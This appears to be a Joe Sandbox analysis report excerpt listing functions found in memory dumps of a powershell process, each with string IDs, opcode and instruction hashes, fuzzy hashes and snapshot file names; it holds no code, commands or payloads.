                                                        • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$x.wk$-wk
                                                        • API String ID: 0-1372607265
                                                        • Opcode ID: 62a1523c89c901a4c913f2ff6fae4981bdabcf97f8b67e9c38346eb7db04cfae
                                                        • Instruction ID: e761460c08d25da81181a1654aa63aabbafe6ed1b6f98ca984d23a4e0c6877cd
                                                        • Opcode Fuzzy Hash: 62a1523c89c901a4c913f2ff6fae4981bdabcf97f8b67e9c38346eb7db04cfae
                                                        • Instruction Fuzzy Hash: 901291B0B002099FDB24DF69C950B6EBBA2AF95314F24C46AD5059F754CF31EC4ACBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078DA308 Relevance: 10.3, Strings: 8, Instructions: 339COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$x.wk$-wk
                                                        • API String ID: 0-1372607265
                                                        • Opcode ID: 41a62a9b5aad0878a4daa515eb75fcc5f87516ebac614190246e9fe6a9f120f5
                                                        • Instruction ID: 6aeb84c45d68985e70d11f69d71b1f711fe9a988f773a85563e4d7228ce1fb99
                                                        • Opcode Fuzzy Hash: 41a62a9b5aad0878a4daa515eb75fcc5f87516ebac614190246e9fe6a9f120f5
                                                        • Instruction Fuzzy Hash: 11D1A274A002088FDB28DFA8C554BAEBBB3EF94304F21C468D505AF755CB75EC458B92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D92AB Relevance: 6.6, Strings: 5, Instructions: 387COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$x.wk$x.wk$-wk
                                                        • API String ID: 0-3652276238
                                                        • Opcode ID: 07e87ce103a18b317a4096eb05fba0a0e73a706ab00ae9fec75355662a6c85a8
                                                        • Instruction ID: 1823edea76fc2581515bafef12cc539646188d66894f972589c153f8d077eb43
                                                        • Opcode Fuzzy Hash: 07e87ce103a18b317a4096eb05fba0a0e73a706ab00ae9fec75355662a6c85a8
                                                        • Instruction Fuzzy Hash: E4F19E74A00218CFDB24DF28CD50FAABBB2EB94304F11C4A5D509AF795CB75ED858B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078DA2EA Relevance: 6.5, Strings: 5, Instructions: 280COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$4'kq$x.wk$-wk
                                                        • API String ID: 0-3833597934
                                                        • Opcode ID: 183a27e54ac0a41c28e24f1ddae70ac04016a5e9790ce785ff18fff5aaaff72d
                                                        • Instruction ID: 83071e6dc0038585bec0b47fcab29916c6650e9f436d3c9540fcc316467608de
                                                        • Opcode Fuzzy Hash: 183a27e54ac0a41c28e24f1ddae70ac04016a5e9790ce785ff18fff5aaaff72d
                                                        • Instruction Fuzzy Hash: 22B1B0B4A00205CFDB18CF98C554BAEBBB2EB94308F25C469D905AF755CB71EC46CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D7D70 Relevance: 6.0, Strings: 4, Instructions: 1013COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$tPkq$tPkq
                                                        • API String ID: 0-4290159910
                                                        • Opcode ID: 49fa5ef83e753a20aba28e0eff210292d5b83a1e268d6f44fcea22b308eecbe1
                                                        • Instruction ID: e4827a0ebd2a6ddfdbbcc5a4899d22e558a8088f34551a71957862743e7d94be
                                                        • Opcode Fuzzy Hash: 49fa5ef83e753a20aba28e0eff210292d5b83a1e268d6f44fcea22b308eecbe1
                                                        • Instruction Fuzzy Hash: 788270B0B00209CFDB24CFA8C945AAABBB2AF95314F14C469D909DF755CB72EC45CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078DDBB0 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$x.wk$-wk
                                                        • API String ID: 0-1611420318
                                                        • Opcode ID: 48db4f25fc1113c81884f7e9da85546e25c633b6631d3e8bbea059fbf017b246
                                                        • Instruction ID: 52b1914442ca2025f61be0ef502f1712ec68bba7a662892730a9a743a2ce4583
                                                        • Opcode Fuzzy Hash: 48db4f25fc1113c81884f7e9da85546e25c633b6631d3e8bbea059fbf017b246
                                                        • Instruction Fuzzy Hash: 91C171B4B002099FDB24DF54C951B9EBBB2AF98304F14885AD915AB754CB31AC4A8BA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D7728 Relevance: 4.2, Strings: 3, Instructions: 466COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tPkq$tPkq$x.wk
                                                        • API String ID: 0-2827554479
                                                        • Opcode ID: 46bae9e9f413bf30b2361724a9bf439fb9cfe4fba3514151caebd30096c857d7
                                                        • Instruction ID: 9c9a93e828326c4a023e9ecad84b18262f9da2b5e645dbb87c49837b2e2613be
                                                        • Opcode Fuzzy Hash: 46bae9e9f413bf30b2361724a9bf439fb9cfe4fba3514151caebd30096c857d7
                                                        • Instruction Fuzzy Hash: A802F3B0B00205DFD724DF69C950FAEBBA2AF95314F248869D905AF795CB32EC44CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F4818 Relevance: 2.6, Strings: 2, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: d%qq$d%qq
                                                        • API String ID: 0-1943325001
                                                        • Opcode ID: 714aae63574c28b11b20531f2af42e89f960a677330909f6b7dfbb1864c47143
                                                        • Instruction ID: 518c225a14c8a4fc2526766ac1848937fff758c23ba477768cbc137397f3289c
                                                        • Opcode Fuzzy Hash: 714aae63574c28b11b20531f2af42e89f960a677330909f6b7dfbb1864c47143
                                                        • Instruction Fuzzy Hash: 5E313874A00609DFCB14CF5CC5809AEFBB2FF48314B2482A9D959AB765C732EC81CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D0619 Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $kq$$kq
                                                        • API String ID: 0-3550614674
                                                        • Opcode ID: 16c425faf48670ff6e15b5e7ada2dc401cfd76c00341a1f5dd8cb359af32e01b
                                                        • Instruction ID: d27c41d608e3819ec37c95188b7f83f56e5ff62754ab8e40bb344209b0fab6c1
                                                        • Opcode Fuzzy Hash: 16c425faf48670ff6e15b5e7ada2dc401cfd76c00341a1f5dd8cb359af32e01b
                                                        • Instruction Fuzzy Hash: AD1184B5309386CFD7228F94D940921BF75AFD2224F19809BD444CF1A2E735DC54CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D0DE0 Relevance: 1.8, Strings: 1, Instructions: 550COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `Bxk
                                                        • API String ID: 0-1425685151
                                                        • Opcode ID: d49e6255bb3d4d73e2351bf07ecf609dc7f323e276e396c6685609ecfea0a9c5
                                                        • Instruction ID: 2ea1953a8aec495dbd1510a63deaccc2a4f408310cbf004fb4c59ff39c3b0dee
                                                        • Opcode Fuzzy Hash: d49e6255bb3d4d73e2351bf07ecf609dc7f323e276e396c6685609ecfea0a9c5
                                                        • Instruction Fuzzy Hash: 4622A1B4B00209CFD724CF58CA44A9ABBF2AF99314F15C469E909EB355DB32EC45CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D12ED Relevance: 1.7, Strings: 1, Instructions: 434COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: h2yk
                                                        • API String ID: 0-3701754721
                                                        • Opcode ID: 711d3dcaac38e14fdabcf02661c706ea90a172c4957ef7c7dd675e068b43cb77
                                                        • Instruction ID: a78f50c37d54fa0c255cbe1d330dccc3812b64b7547e63a65fa5133eae5e4d0d
                                                        • Opcode Fuzzy Hash: 711d3dcaac38e14fdabcf02661c706ea90a172c4957ef7c7dd675e068b43cb77
                                                        • Instruction Fuzzy Hash: C9027CB4B00209DFD714CF58CA44EA9BBB2AF99308F15C1A9E909AB355D772EC45CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F1004 Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V*k
                                                        • API String ID: 0-2107984380
                                                        • Opcode ID: a32bc5a58fa6adda592fc32d62bc80ef8d532a2d75eb904dec36d58e1667b5a4
                                                        • Instruction ID: 6b937cf10d69db8f5b6e2122ad26dd57211e5869c4c5b718a849b5ad533e7f86
                                                        • Opcode Fuzzy Hash: a32bc5a58fa6adda592fc32d62bc80ef8d532a2d75eb904dec36d58e1667b5a4
                                                        • Instruction Fuzzy Hash: 8AB14770E00249CFDB11CFA9C98579EBBF2AF88315F14812EE915EB355EB749846CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D08C2 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $kq
                                                        • API String ID: 0-3037731980
                                                        • Opcode ID: c796b1c9c3e34b248616b8d3adb7eb3c4c57d6e68c5e50a85c74b5aae622da54
                                                        • Instruction ID: 196175290ff3576c01b803dbbf037a32d6f0919d927a4cf9fbdb13a8c22ce669
                                                        • Opcode Fuzzy Hash: c796b1c9c3e34b248616b8d3adb7eb3c4c57d6e68c5e50a85c74b5aae622da54
                                                        • Instruction Fuzzy Hash: F78149B2708345DFDB218F29881076BBBB2EFD2215F2984ABD449CB292CB35CC45C761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F5BD8 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PHkq
                                                        • API String ID: 0-902561536
                                                        • Opcode ID: 26ca19d3bd3c1e8c3bfbea2e8daca6cb32e9637febcec19a196e35730c200e3d
                                                        • Instruction ID: a332b42b6cb1d272c5cea05ee2c8595b952b1ddee17e234d0cbf86d31c6d5d45
                                                        • Opcode Fuzzy Hash: 26ca19d3bd3c1e8c3bfbea2e8daca6cb32e9637febcec19a196e35730c200e3d
                                                        • Instruction Fuzzy Hash: F4716B70E002498FDB15DFE4C9547AEBBB2AF85305F25812ED502AF39ADB74AD49CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D62EC Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tPkq
                                                        • API String ID: 0-145634721
                                                        • Opcode ID: 8b4eaab3d69ee0ace394f122c9e9dcf93ac5f0d105ee93677539f9d13e98572b
                                                        • Instruction ID: f84b63ba5555d5368d56ebdae1c6a2efd7c05bba9caf59cb9994d1d705c99b1c
                                                        • Opcode Fuzzy Hash: 8b4eaab3d69ee0ace394f122c9e9dcf93ac5f0d105ee93677539f9d13e98572b
                                                        • Instruction Fuzzy Hash: 7D5198B07493898FC7268F648850656BFB2AF66214F18C4CFE445CF293E675EC46C792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F5BC8 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PHkq
                                                        • API String ID: 0-902561536
                                                        • Opcode ID: 7c66b03d26d468c0963e398b1272d8bc0787674b3893c453b4f1a11332dffc08
                                                        • Instruction ID: 3d523b25e54e1a495f51f3669eaec53fe74efb5dfc94f0f733b5b3021ea9d044
                                                        • Opcode Fuzzy Hash: 7c66b03d26d468c0963e398b1272d8bc0787674b3893c453b4f1a11332dffc08
                                                        • Instruction Fuzzy Hash: FB51AE70E00348CFDB15DFA4D9486AEBBB2BF85301F25816ED506AF3A5DB74A949CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078DA72E Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: x.wk
                                                        • API String ID: 0-117599076
                                                        • Opcode ID: 9ac16dd152a8de19d8ad59d8596a8ade09dce2b48abfe12765c9a5702fbd3038
                                                        • Instruction ID: f2713b46598f3e003e60f25f269cd783f3f53d48975d58e1000989848755f2c4
                                                        • Opcode Fuzzy Hash: 9ac16dd152a8de19d8ad59d8596a8ade09dce2b48abfe12765c9a5702fbd3038
                                                        • Instruction Fuzzy Hash: 5431D5747402049FE714A768C955FAEBB63EBD4304F10C464E9016F795CE75EC458BD1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D8108 Relevance: .5, Instructions: 541COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e58edc0b1f5f5cc58c5e2050027761795691a1ea85a45cff63071a154514499a
                                                        • Instruction ID: 4061217568a200f15e2e16f82d76604983ba1c6a342372c06f4f73417f20ec83
                                                        • Opcode Fuzzy Hash: e58edc0b1f5f5cc58c5e2050027761795691a1ea85a45cff63071a154514499a
                                                        • Instruction Fuzzy Hash: DA3229B4A00205CFDB24CF98C945E99BBB2FB94314F15C5A9D909AF355CB72EC46CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D887D Relevance: .5, Instructions: 483COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3da31d47f88ce3c721ae6866ef420628f331f201246a84293cbc53eda6ad6fb0
                                                        • Instruction ID: 7830e55f7302b84bf0e859bb2698c6518b918b2ef2e7e163aa04d1e4a2177057
                                                        • Opcode Fuzzy Hash: 3da31d47f88ce3c721ae6866ef420628f331f201246a84293cbc53eda6ad6fb0
                                                        • Instruction Fuzzy Hash: C3123BB4A00209CFDB24CF98C945E69BBB2FB94314F15C4A9E909AF755CB72EC46CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F7040 Relevance: .4, Instructions: 433COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 300ab746771ec48ef32e18159b5ce9f213159b70b0bc76b9a35f317e0febe674
                                                        • Instruction ID: 13dfd5061463a6a8763f84970869719613e3c85e175395c84bb92cd0779a35c6
                                                        • Opcode Fuzzy Hash: 300ab746771ec48ef32e18159b5ce9f213159b70b0bc76b9a35f317e0febe674
                                                        • Instruction Fuzzy Hash: 4F022B74A00249DFCB15CF98D984A9EBBB2FF48310F24856AE905AB365C735ED85CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D0DC5 Relevance: .4, Instructions: 409COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 03116f2f463c01d1ed04c3c468f97f528de9ef27b7418226749bdfcb9a91efc9
                                                        • Instruction ID: 5ccf9efecddb8488417dfff21a7f0a7fbd3d114c85c02428462ba9ef1947f578
                                                        • Opcode Fuzzy Hash: 03116f2f463c01d1ed04c3c468f97f528de9ef27b7418226749bdfcb9a91efc9
                                                        • Instruction Fuzzy Hash: 9A027CB4A00209CFD714CF98CA84E99BBF2BF99714F15C199E909AB355D732EC45CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F23E8 Relevance: .3, Instructions: 339COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0404c45545fd7e615b4ca52e467f87039bd08cf5ee6ae74ca2beed3755d9723e
                                                        • Instruction ID: 68b40d93baffcef71b61593c8f1f83936bfc20618d686e8a8e573a4ce3bbe7ee
                                                        • Opcode Fuzzy Hash: 0404c45545fd7e615b4ca52e467f87039bd08cf5ee6ae74ca2beed3755d9723e
                                                        • Instruction Fuzzy Hash: 92E12B74A00219DFDB15CF98C594A9EFBB2FF48311F248169E905AB366C771ED82CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F18D5 Relevance: .3, Instructions: 264COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d389e5ae0c9ea93346a14565edb4726c3e11feeae3609af3a3d58ab0cca04128
                                                        • Instruction ID: c912e8038645dfba2c55179468300cc4bb9cdc3dc73520296f893420f003c2ca
                                                        • Opcode Fuzzy Hash: d389e5ae0c9ea93346a14565edb4726c3e11feeae3609af3a3d58ab0cca04128
                                                        • Instruction Fuzzy Hash: A5B15A70E00209CFDB11CFA9C981BAEBBF1AF48315F14853EE915AB355EB749885CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F6238 Relevance: .2, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bae5aaa9173139dc457f63d5c09848115f4a36e480b57ee10a7895a0cbd59b33
                                                        • Instruction ID: b1902ce1759e9eb49019612dde16e4ced1f70f53305224bb1aeaf5ea461713a4
                                                        • Opcode Fuzzy Hash: bae5aaa9173139dc457f63d5c09848115f4a36e480b57ee10a7895a0cbd59b33
                                                        • Instruction Fuzzy Hash: E981AD30B002158FCB15DFA8D940AAEBBF6FF88310F158569D5059B366DB35EC46CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F6228 Relevance: .1, Instructions: 142COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d3fb1b188ea6a5863af66802403dc2e18407e96f273acbb10852d7220595896f
                                                        • Instruction ID: b6ee0256b37f904a46d973944484d5d3288cff02380511d8a070e4431acceeb3
                                                        • Opcode Fuzzy Hash: d3fb1b188ea6a5863af66802403dc2e18407e96f273acbb10852d7220595896f
                                                        • Instruction Fuzzy Hash: 1F51AC34B002058FCB25EBA8D9506AEBBF6FFC4311F1581A9D805AB365DF359D46CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F23A0 Relevance: .1, Instructions: 112COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eba7acfe2d6cbcfec1ad155931bc48b198ec352398c37b0c20b851696db1e08a
                                                        • Instruction ID: 6608be456500ba218c139b4dd05502ab9b7a816c868916e19b363c6609b83e96
                                                        • Opcode Fuzzy Hash: eba7acfe2d6cbcfec1ad155931bc48b198ec352398c37b0c20b851696db1e08a
                                                        • Instruction Fuzzy Hash: 4041C470A05255CFCB01CF68C5909A9BBB1FF49310B2586AAD548EB352C371BC41CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F7030 Relevance: .1, Instructions: 109COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e658f662af895e24a44f22b158fe4096eceaf284acd400bba5bcfd5c99a5ce01
                                                        • Instruction ID: 2e26361d1f1f4bd70c3da47b1f859f871c67ef83352c54e1353ce3446fc412d4
                                                        • Opcode Fuzzy Hash: e658f662af895e24a44f22b158fe4096eceaf284acd400bba5bcfd5c99a5ce01
                                                        • Instruction Fuzzy Hash: A2413A74A0124ADFCB15CF98C9849AEFBB2FF48310B24856AD905AB365D736EC45CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D2C90 Relevance: .1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 611570ca717568195fa712798c6c515e1e4b5b11b533122de5a2a1cc7b10cc73
                                                        • Instruction ID: fe7f65a0872304b754b5bc06db3669f035146d9863e130994d84b0cd5572bccc
                                                        • Opcode Fuzzy Hash: 611570ca717568195fa712798c6c515e1e4b5b11b533122de5a2a1cc7b10cc73
                                                        • Instruction Fuzzy Hash: 8A215FB3B001298BD731AA6C5925AAEBB52EFE4314F1084B6D905DB745CE32DC45C3E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D6041 Relevance: .1, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 75e8c96d8af8496ed01bc95acad58ee5899d544ea9614fc32f41f9393e4b31cd
                                                        • Instruction ID: 99aa42ce56d9fd867ad1dd7e96e071f5a6f70cd5402baf7a159b8a291b17de4e
                                                        • Opcode Fuzzy Hash: 75e8c96d8af8496ed01bc95acad58ee5899d544ea9614fc32f41f9393e4b31cd
                                                        • Instruction Fuzzy Hash: EA3145B020D3C99FD7139B648C61B96BF309F23254F0980D7E544DF1A3EA289C49C722
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 084F61A1 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
